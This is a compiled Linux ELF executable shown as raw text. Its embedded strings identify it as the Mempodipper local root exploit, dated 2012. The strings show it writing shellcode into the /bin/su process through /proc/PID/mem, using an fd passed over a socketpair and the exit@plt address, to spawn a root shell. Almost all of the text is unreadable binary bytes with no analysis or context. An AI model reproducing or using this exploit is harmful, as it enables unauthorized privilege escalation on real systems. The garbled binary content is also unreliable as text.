ELF>@ @@#@8@@@@@@@@@@dd  ` ` ( ( `( `@@DDPtd@@ddQtd/lib64/ld-linux-x86-64.so.2GNUGNUGbwZߓ K=u&b- 9pT%iC>Z2NzO__gmon_start__libc.so.6exitexeclsprintfwaitperrorputsforksocketpairpopenfgetsgetppidmemsetstrstrreaddup2strtoulptracesendmsgpcloseatoilseek64memmovepipe2recvmsg__libc_start_mainGLIBC_2.2.5GLIBC_2.9ui ii!`!`!`!`!`!`"`"`"` "` "` ("` 0"`8"`@"`H"`P"`X"``"`h"`p"`x"`"`"`"`"`"`"`"`H  H5R %T @%R h%J h%B h%: h%2 h%* h%" h% hp% h`%  h P% h @% h 0% h % h% h% h% h% h% h% h% h% h% h% hp% h`% hP% h@%z h01I^HHPTI`@Hp@HR@HHA HtHÐUHSH=  uK `H H `HHH9s$fDHH  `H H9r H[fff.H= UHtHt `ÐUHHlhEHEHEHEHE8HKHEHEHEHpHEHEHEHvHEHEHEHHE@HE@ HEHHHhHHHMlHΉvEEHcHEH9tlUHHlHEHEHEHE8HRHEEHEHEHEHpHEHEHMlHΉGE}yR}uEHEHvHEHEHEHHHEHHlEUHHX@HEHMr@E} Eg@}H`EHMߺHΉH Eƿ븐@*Eƿ HHEHѺƿ HUHoH9wHUEƿfHEHE%H=%hHEz@}Hy0@pH' H  @HHǸ1@HUHHǸHEUHH@W@(@HEH}u@HUHHHEHHN@HH)UHH `¹g@HHHǸx@HHHǸHHǸME}y@ .@UHǸU։UHHĀH}@HEH2y@ew@SEE@UHǸ}y2@?@@UHǸEHHUHH)HHE`@HUHHǸjHMEHΉEH1EiHE1jEH1E@E@E!HE//bEin/sEhHESHEH1Ef-iESHEH1PEQWHEH1E԰;E@HEH¾L@O@QU๡@HEHHǸJ@H HUAHѺ@Hƿ@UHH}HuHEHHa }~GHEHH<-u5HEHHH'|head -n 1|cut -d ' ' -f 1|sed 's/^[0]*\([^0]*\)/0x\1/'[-] popen[+] Ptracing su to find next instruction without reading binary.[-] Ptrace failed.[+] Reading su binary with objdump to find exit@plt.[-] Could not resolve /bin/su. Specify the exit@plt function address manually.[-] Usage: %s -o ADDRESS [-] Example: %s -o 0x402178 [+] Resolved call address to 0x%lx. [+] Calculating su padding./bin/su this-user-does-not-exist 2>&1this-user-does-not-exist/proc/%d/mem[+] Opening parent mem %s in child. [-] open[+] Sending fd %d to parent. [+] Opening socketpair.[-] socketpair[+] Waiting for transferred fd in parent.[+] Received fd at %d. [-] recv_fd[+] Assigning fd %d to stderr. [+] Seeking to offset 0x%lx. [+] Executing su with shellcode.%d[+] Executing child from child fork.-c/proc/self/exe================================ Mempodipper == by zx2c4 == Jan 21, 2012 ================================ ;` |Qj<\|zRx AC <AC \AC |mlACg AC FAC AC E%AC  JAC <8$T0Q_@X X @8@o`@P@@ !`@@ op@oo4@( ` @ @ @ @ @ @ @ @ @ @& @6 @F @V @f @v @ @ @ @ @ @ @ @ @ @ @& @6 @GCC: (GNU) 4.4.6 20110731 (Red Hat 4.4.6-3).symtab.strtab.shstrtab.interp.note.ABI-tag.note.gnu.build-id.gnu.hash.dynsym.dynstr.gnu.version.gnu.version_r.rela.dyn.rela.plt.init.text.fini.rodata.eh_frame_hdr.eh_frame.ctors.dtors.jcr.dynamic.got.got.plt.data.bss.comment@#@ 1<@<$Do`@`N @VP@P^o4@4<kop@p0z@@ X @X p @p @ @@ 8@8H@H9@d@| `  `  ` ( `( !`!!`!"`""`"0","h+H . 4S@@<@`@@P@4@p@ @ @ X @ p @@ @8@H@@@ ` ` `( `!`!`"`"`l @ `* `8 `E @["`j"`x @ ``@ `@!` ` ` ( ` "`.@Th`@x@ @  8@+J]'@eH@t"`@A@P@@l 4 `Ap@Qcx"`$ @"`@-@%"`&8R@= X @C"`Mz@call_gmon_startcrtstuff.c__CTOR_LIST____DTOR_LIST____JCR_LIST____do_global_dtors_auxcompleted.6347dtor_idx.6349frame_dummy__CTOR_END____FRAME_END____JCR_END____do_global_ctors_auxmempodipper.c_GLOBAL_OFFSET_TABLE___init_array_end__init_array_start_DYNAMICdata_startpipe2@@GLIBC_2.9dup2@@GLIBC_2.2.5printf@@GLIBC_2.2.5memset@@GLIBC_2.2.5__libc_csu_fini_startclose@@GLIBC_2.2.5wait@@GLIBC_2.2.5__gmon_start___Jv_RegisterClassesputs@@GLIBC_2.2.5recvmsg@@GLIBC_2.2.5exit@@GLIBC_2.2.5_finiexecl@@GLIBC_2.2.5read@@GLIBC_2.2.5__libc_start_main@@GLIBC_2.2.5fgets@@GLIBC_2.2.5recv_fd_IO_stdin_used__data_startsu_paddingpclose@@GLIBC_2.2.5sprintf@@GLIBC_2.2.5sendmsg@@GLIBC_2.2.5strstr@@GLIBC_2.2.5find_addresssocketpair@@GLIBC_2.2.5__dso_handleobjdump_addressptrace@@GLIBC_2.2.5__DTOR_END____libc_csu_initatoi@@GLIBC_2.2.5memmove@@GLIBC_2.2.5__bss_startsend_fd_endlseek64@@GLIBC_2.2.5ptrace_addressfork@@GLIBC_2.2.5getppid@@GLIBC_2.2.5parentperror@@GLIBC_2.2.5_edatapopen@@GLIBC_2.2.5strtoul@@GLIBC_2.2.5open@@GLIBC_2.2.5main_initprog_namechild